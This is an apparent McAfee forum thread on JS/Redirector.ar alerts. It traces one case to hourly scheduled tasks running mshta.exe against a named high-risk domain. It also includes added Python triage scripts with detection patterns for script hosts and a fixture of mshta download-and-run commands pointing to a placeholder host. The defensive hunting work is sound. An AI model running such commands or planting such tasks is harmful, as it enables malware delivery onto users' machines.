2536 Views 11 Replies Latest reply: May 14, 2013 9:25 PM by rmetzger
dans Newcomer 35 posts since
Oct 18, 2012

Apr 30, 2013 1:00 PM

JS/Redirector.ar how to defend against or False Positives?

Reviewing my top threat events I have a large number of JS/Redirector.ar alerts. Upon review, I strongly feel these are false positives. Why? Because some of the threat target paths are files from our own websites and, from my knowledge, have no reports of dropping malware on anyone's PC. We have an outbound web proxy as well, which would likely have alerted us to any malicious content or websites. So why do I have so many JS/Redirector.ar alerts? How can I stop them from a different network layer vs. on the client endpoint? I have web proxies, which I expect should defend against this attack vector, so why aren't they, or is McAfee filling my log books with false positives? Likely the case, so what's the best way to stop the noise without losing security?

 

An example threat target path is

temporary internet files\content.ie5\adcdf\169comparison[1].htm

  • jp75 Newcomer 3 posts since
    May 3, 2013

    I'm receiving similar alerts.  Were you able to find a resolution?

  • jp75 Newcomer 3 posts since
    May 3, 2013

    That's what I feared.  Unfortunately I can't find much, if anything, about this alert.  Full scans of "infected" machines do not find anything else. 

     

    Well...good luck and I hope you find the cause.

  • schgu Newcomer 3 posts since
    Feb 4, 2005

    Same here... found out that ALL of these alerts were false positives. Depends on redirection parameters of JavaScript on the website. Seems like a "generic" pattern. But unfortunately no way to avoid that. This has to be corrected by McAfee.

     

    Greetings schgu

  • Hayton Volunteer Moderator 4,590 posts since
    Sep 27, 2010

    This Redirector is also being detected by McAfee on some home PCs. A poster has noted that in his Security History the detection is being made once an hour, consistently.

     

    If this is not a false positive that hourly detection might be significant, but I don't know if this is because the AV software is making an hourly check (seems unlikely) or something is creating the file once an hour.

     

    That detected file has the name "LoginCA<xxxxnn>.htm" which looks like a login screen for some website. The location is in a hidden folder (Network Service\Local Settings\Temporary Internet Files\Content.IE5).

     

    Can posters to this thread check their event logs to see whether there is a similar pattern of detection at fixed intervals?


    Volunteer Moderator  Leeds, UK
    No PM's please
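    As an added example (not part of the thread, and not McAfee's or any poster's code), here is a small Python check for the fixed-interval pattern Hayton asks posters to look for: it parses a detection log and reports whether a given detection name recurs at a regular spacing, which points at something creating the file on a timer rather than at a user browsing. The log lines, their "date time detection path" format and the timestamps are constructed for illustration; adjust LINE_RE to the columns of your ePO threat-event export.

```python
"""Flag AV detections that recur at a fixed interval (e.g. once an hour).

Added example for this thread, not McAfee's or the posters' code. The log
lines below are constructed; the format "<date> <time> <detection> <path>"
is an assumption, so adjust LINE_RE to your ePO threat-event export.
"""
import re
import statistics
from datetime import datetime

LINE_RE = re.compile(r"^(\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) (\S+) (.+)$")

# Constructed: the "once an hour" pattern described in the thread, plus one
# unrelated detection in between.
HOURLY_LOG = r"""2013-05-10 00:02:11 JS/Redirector.ar C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\AB12CD34\LoginCA1234[1].htm
2013-05-10 01:02:09 JS/Redirector.ar C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\AB12CD34\LoginCA1235[1].htm
2013-05-10 01:17:40 Generic.dx C:\Documents and Settings\alice\My Documents\Downloads\setup.exe
2013-05-10 02:02:12 JS/Redirector.ar C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\AB12CD34\LoginCA1236[1].htm
2013-05-10 03:02:10 JS/Redirector.ar C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\AB12CD34\LoginCA1237[1].htm
2013-05-10 04:02:11 JS/Redirector.ar C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\AB12CD34\LoginCA1238[1].htm
2013-05-10 05:02:13 JS/Redirector.ar C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\AB12CD34\LoginCA1239[1].htm
"""

# Constructed: what browsing-driven hits on the same signature look like.
BROWSING_LOG = r"""2013-05-10 09:14:02 JS/Redirector.ar C:\Documents and Settings\bob\Local Settings\Temporary Internet Files\Content.IE5\ZZ99YY88\169comparison[1].htm
2013-05-10 09:31:55 JS/Redirector.ar C:\Documents and Settings\bob\Local Settings\Temporary Internet Files\Content.IE5\ZZ99YY88\index[1].htm
2013-05-10 11:48:20 JS/Redirector.ar C:\Documents and Settings\bob\Local Settings\Temporary Internet Files\Content.IE5\ZZ99YY88\news[1].htm
2013-05-10 14:05:07 JS/Redirector.ar C:\Documents and Settings\bob\Local Settings\Temporary Internet Files\Content.IE5\ZZ99YY88\product[1].htm
2013-05-10 14:06:30 JS/Redirector.ar C:\Documents and Settings\bob\Local Settings\Temporary Internet Files\Content.IE5\ZZ99YY88\product[2].htm
"""


def parse_events(log_text):
    """Return (timestamp, detection_name, path) tuples, skipping unparsable lines."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            events.append((datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S"),
                           m.group(2), m.group(3)))
    return events


def interval_profile(events, detection, tolerance_s=120, min_hits=4):
    """Summarise the spacing of one detection name.

    Returns None if there are too few hits to judge; otherwise a dict with the
    median gap between hits (seconds) and the fraction of gaps that sit within
    tolerance_s of that median.
    """
    times = sorted(ts for ts, name, _ in events if name == detection)
    if len(times) < min_hits:
        return None
    gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
    median_gap = statistics.median(gaps)
    regular = sum(1 for g in gaps if abs(g - median_gap) <= tolerance_s)
    return {"hits": len(times), "interval_s": median_gap,
            "regular_fraction": regular / len(gaps)}


def looks_scheduled(profile, min_regular=0.8):
    """True when most gaps share one interval: something recreates the file on a timer."""
    return profile is not None and profile["regular_fraction"] >= min_regular


if __name__ == "__main__":
    for label, log in (("hourly", HOURLY_LOG), ("browsing", BROWSING_LOG)):
        p = interval_profile(parse_events(log), "JS/Redirector.ar")
        print(label, p, "scheduled" if looks_scheduled(p) else "not scheduled")
```

    The tolerance absorbs the few seconds of jitter a scheduler adds; the hourly sample comes out with every gap on the same interval, while the browsing sample has no two gaps alike and is left alone.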
  • schgu Newcomer 3 posts since
    Feb 4, 2005

    Hourly detection seems rather suspicious to me. This might be a true infection where malware tries to connect to a command server. Delete temporary internet files first; if detection continues (without surfing on the internet) then do a full scan with AV.

     

    I'm getting these alerts while surfing on different (harmless) sites only.

     

    Greets

     

    Message edited by schgu on 10.05.13 15:36:03 MESZ
  • Hayton Volunteer Moderator 4,590 posts since
    Sep 27, 2010

    This is what Microsoft has to say about Trojan JS/Redirector.ar : I'm assuming that McAfee and Microsoft are referring to the same Redirector.

     

    http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Trojan%3AJS%2FRedirector.AR

     

    Trojan:JS/Redirector.AR is a malicious JavaScript inserted into Web pages by an attacker. The trojan script checks for the presence of Adobe Flash Player and Microsoft Office Web Components, redirecting the user to other Web pages that may exploit the vulnerabilities of Adobe Flash Player and MS Office Web Components.


    When a Web page containing the script is viewed using a vulnerable computer, exploits used in the JavaScript redirect the Web browser within IFrames to other pages, potentially downloading or executing other malware.

     

    So yes, it's possible the poster in the thread in the Consumer section is seeing the effects of downloaded malware. A Full McAfee scan found nothing, but the hourly quarantining of the file noted above is continuing.


    Volunteer Moderator  Leeds, UK
    No PM's please
  • schgu Newcomer 3 posts since
    Feb 4, 2005

    This is correct. The Microsoft Encyclopedia entry was updated in April 2011. This is, in my case, a strong indication of a false positive. Today there are some dozens of newer variations of JS/Redirector in the field. Why should this "old chap" appear so often during the last 4-5 weeks?

     

    In your case it seems to be a different story. Why not try a different scanner to double-check?

     

    For example this one (or similar)

    http://www.malwarebytes.org/products/mbar/

  • Hayton Volunteer Moderator 4,590 posts since
    Sep 27, 2010

    The poster in the Consumer section found a batch of ATnn tasks in Task Scheduler, one per hour of the day. That accounts for McAfee's hourly detection of the Redirector, and also why scans with McAfee and Malwarebytes failed to find anything. Each hourly task created an instance of mshta.exe and tried to connect to global-network-solution.com, a site rated High Risk by TrustedSource (and Red rated by SiteAdvisor, so don't try to go there). The interesting part is why, for a Red site, the connection was allowed, as it must have been.

     

    Still, the relevant information here is Task Scheduler. Perhaps everyone seeing this detection should check their scheduled tasks. And Googling shows that this technique (with the hourly AT.. tasks, and mshta.exe) has been used successfully for years. Simple, but effective.


    Volunteer Moderator  Leeds, UK
    No PM's please
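    As an added example (not from the thread, McAfee or any poster), a Python script that triages `schtasks /query /fo CSV /v` exports collected from endpoints for the pattern Hayton describes: AT-style task names and commands that launch mshta.exe, counted per host, with the contacted hostnames pulled out so they can be blocked at the proxy, which is where the original question wanted the control. The CSV below is constructed and trimmed to a few of schtasks' real columns; the URL in it is a placeholder, not an indicator from the thread, and the list of script hosts checked is a starting point rather than anything the posters reported.

```python
"""Hunt exported scheduled-task listings for AT-style tasks that launch mshta.exe.

Added example for this thread, not McAfee's or the posters' code. Input is the
CSV written by `schtasks /query /fo CSV /v` on each endpoint; the sample here
is constructed and trimmed to six of that command's columns. The URL is a
placeholder (example.invalid), not an indicator from the thread.
"""
import csv
import io
import re

# Constructed sample: three hourly AT tasks calling mshta.exe plus one
# legitimate task. schtasks /v repeats the header row before each task
# folder, which the parser below has to tolerate.
SAMPLE_SCHTASKS_CSV = r'''"HostName","TaskName","Task To Run","Run As User","Schedule Type","Start Time"
"WS01","\At1","mshta.exe http://example.invalid/a.hta","SYSTEM","Daily","1:00:00 AM"
"WS01","\At2","mshta.exe http://example.invalid/a.hta","SYSTEM","Daily","2:00:00 AM"
"WS01","\At3","mshta.exe http://example.invalid/a.hta","SYSTEM","Daily","3:00:00 AM"
"HostName","TaskName","Task To Run","Run As User","Schedule Type","Start Time"
"WS01","\Microsoft\Windows\Defrag\ScheduledDefrag","%windir%\system32\defrag.exe -c","SYSTEM","Weekly","1:00:00 AM"
'''

# Tasks created with at.exe are named At1, At2, ... (schtasks shows them as \At1).
AT_TASK_RE = re.compile(r"^\\?At\d+$", re.IGNORECASE)
# Script hosts commonly used to run downloaded content; mshta is the one the
# thread reports, the other two are an assumption added for breadth.
SCRIPT_HOST_RE = re.compile(r"\b(mshta|wscript|cscript)\.exe\b", re.IGNORECASE)
URL_HOST_RE = re.compile(r"https?://([^/\s\"']+)", re.IGNORECASE)


def load_tasks(csv_text):
    """Parse schtasks CSV, dropping the header rows /v repeats per folder."""
    rows = csv.DictReader(io.StringIO(csv_text))
    return [r for r in rows if r.get("TaskName") != "TaskName"]


def suspicious_tasks(rows):
    """Return one finding per task that has an AT-style name or runs a script host."""
    findings = []
    for r in rows:
        reasons = []
        if AT_TASK_RE.match(r["TaskName"]):
            reasons.append("AT-style task name")
        m = SCRIPT_HOST_RE.search(r["Task To Run"])
        if m:
            reasons.append("launches script host " + m.group(1).lower())
        if reasons:
            findings.append({"host": r["HostName"], "task": r["TaskName"],
                             "command": r["Task To Run"], "user": r["Run As User"],
                             "start": r["Start Time"], "reasons": reasons})
    return findings


def at_task_counts(rows):
    """Count AT-style tasks per host; 24 of them is the one-per-hour layout."""
    counts = {}
    for r in rows:
        if AT_TASK_RE.match(r["TaskName"]):
            counts[r["HostName"]] = counts.get(r["HostName"], 0) + 1
    return counts


def network_indicators(findings):
    """Hostnames referenced by flagged commands, for a proxy or DNS block list."""
    hosts = set()
    for f in findings:
        hosts.update(h.lower() for h in URL_HOST_RE.findall(f["command"]))
    return hosts


if __name__ == "__main__":
    tasks = load_tasks(SAMPLE_SCHTASKS_CSV)
    found = suspicious_tasks(tasks)
    for f in found:
        print(f["host"], f["task"], f["start"], f["user"], "|", f["command"],
              "|", "; ".join(f["reasons"]))
    print("AT tasks per host:", at_task_counts(tasks))
    print("block at proxy:", sorted(network_indicators(found)))
```

    Run it over the CSVs from every machine that logged the detection rather than only the one you happen to be sitting at: the per-host AT count and the shared hostname are what tell you whether this is one odd box or the same implant fleet-wide, and the hostname is the one artefact the proxy can act on.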